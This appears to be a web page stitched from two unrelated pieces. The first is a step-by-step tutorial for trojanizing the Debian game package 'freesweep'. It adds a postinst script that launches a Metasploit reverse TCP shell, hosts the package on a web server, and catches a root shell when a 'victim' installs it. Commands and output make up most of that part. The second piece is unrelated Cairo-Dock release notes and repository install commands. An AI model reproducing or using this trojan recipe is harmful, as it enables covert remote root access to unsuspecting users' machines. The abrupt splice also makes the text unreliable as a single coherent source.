We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.

root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#

Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN

In the 'DEBIAN' directory, create a file named 'control' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# nano control

Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper

We also need to create a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# cat postinst

#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443

We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/

If it is not already running, we'll need to start the Apache web server.

root@kali:/tmp/evil# service apache2 start

We will need to set up the Metasploit multi/handler to receive the incoming connection.

root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.105/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb

As the victim installs and plays our game, we have received a shell!

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)

How to install Dock in Kali Linux

Install Dock in Kali Linux

Cairo-Dock is a pretty, fast and customizable desktop interface. You can see it as a good alternative/addition to Unity, Gnome-Shell, Xfce-panel, KDE-panel, etc
Here is a short summary of the improvements and new features in this version 3.1. Cairo-Dock sits in the centre of your desktop, allowing you to monitor and control your favourite apps: music players, chat messengers, twitter, torrents downloaders, RSS feeds, calendar/tasks, weather, mail checkers, etc, and a powerful taskbar.

Cairo Dock includes many plugins/applets such as: weather, clock, Messaging Menu, system monitor, keyboard indicators, custom icons, notification area, clipboard manager, and many other plugins.

What's New in Cairo Dock?
Main Changes:

• Better integration of Unity: support of the Launcher API and better support of indicators


• All configuration windows have been merged into a single one.


• Added progress bars in several applets and in the Dbus API


• The Music Player applet can control players in the systray.


• Icons of the taskbar can be separated from launchers or not


• The advanced mode of the configuration panel has been improved (thanks to SQP!)


• Messaging Menu has been rewritten for newer versions and two new 'indicator' applets have been added:


• Printers-Menu: it shows active print jobs.


• and Sync-Menu: e.g. on Ubuntu 12.10, it collects status information data from processes that involve some form of synchronisation with servers; such as about apps like Ubuntu One.


• various bug fixes and improvements

Core:

• The dock now supports XRandr which should replace Xinerama and help the dock to manage multi-monitors.


• Progress bars can now be customised (in the advanced mode of the configuration panel / 'Indicators' module).


• We can drop .sh files into the dock to quickly create a new launcher.


• The "Lock icons position" now only block the icons position but we can still add new launchers/files from the menu/file manager.


• QuickList menu entries are now translated if it's available.


• We can now launch the dock with '-W' (--metacity-workaround) option which is a workaround for window managers (e.g. Metacity) not handling the opacity correctly (if your subdock/dock/dialogues are invisible).


• Window's actions have been merged into a single menu entry (right-click menu).


• The default view now use all the screen space to avoid the jitter of the dock when it is resized (visible only if your window manager doesn't resize it correctly).


• Labels in vertical dock now ends with a gradation.


• The dock now supports animated images with variable rate (have a look to the new 'Busy' animation when the Weather applet is downloading data or when you're uploading files with the 'Drop to Share' applet).

Plug-ins:

• Clock: We can now easily add a new task by doing a right click on the calendar.


• Drop to Share: Supported text files (now it uploads the content of text files to servers like pastebin).


• Applications Menu: used gio to launch the menu entries, so that the event is stored in Zeitgeist.


• Mail: Improved the look of the icon and its dialogue.


• MusicPlayer: Prevented displaying quicklists, since the applet already provides all the common actions for any player.


• Notification Area: displayed the title, the label and the description (if they are available) on the label of the icon.


• PowerManager: displayed the details of all batteries (and not only the first one) and modify the icon if the battery is removed/added.


• QuickBrowser: Added drag support (e.g. to quickly drop file into GMail in order to join this file to the mail).


• Recent-Events: prevented double entries in the menu list and unavailable files.


• Recent Events: added recent applications.


• Shortcuts: added the possibility to launch nautilus-connect-server from its menu


• Shortcuts: Move 'Home' directory to the bookmark list


• Stack: it now supports all URI extensions, not only files from the file system but also files from servers or even from the trash.


• Switcher: Added new options and modify the lists of options. Now we can have a very simple drawing (like Swichter applet of the Gnome-Panel).


• Added an option to have progress bars in a few applet (Sound Control, Wifi, PowerManager, etc.).

Other Changes:

• A new 'third-party' applet is available: YoutubeDL to easily download Youtube videos (thanks to Brian).


• Twitter applet now supports Identi.ca.


• 3 new themes are available.


• The code has been cleaned in order to remove most warnings when we compile it with -Wall (and -Wextra for the core).


• Translations have been updated.

Installation with one copy-paste

If you don't want to learn more about the installation or if you want a quick install of the dock, copy-paste all this box in a terminal
(Note: The 2nd line is long and is maybe displayed as 2 lines on the page, but it's a single line.)

• sudo -v

Please write your password (it's invisible )

• echo "deb http://download.tuxfamily.org/glxdock/repository/ubuntu $(lsb_release -sc) cairo-dock" | sudo tee -a /etc/apt/sources.list

• wget -q http://download.tuxfamily.org/glxdock/repository/cairo-dock.gpg -O- | sudo apt-key add -

• sudo apt-get update

• sudo apt-get install cairo-dock cairo-dock-plug-ins # or if the dock is already installed => # sudo apt-get dist-upgrade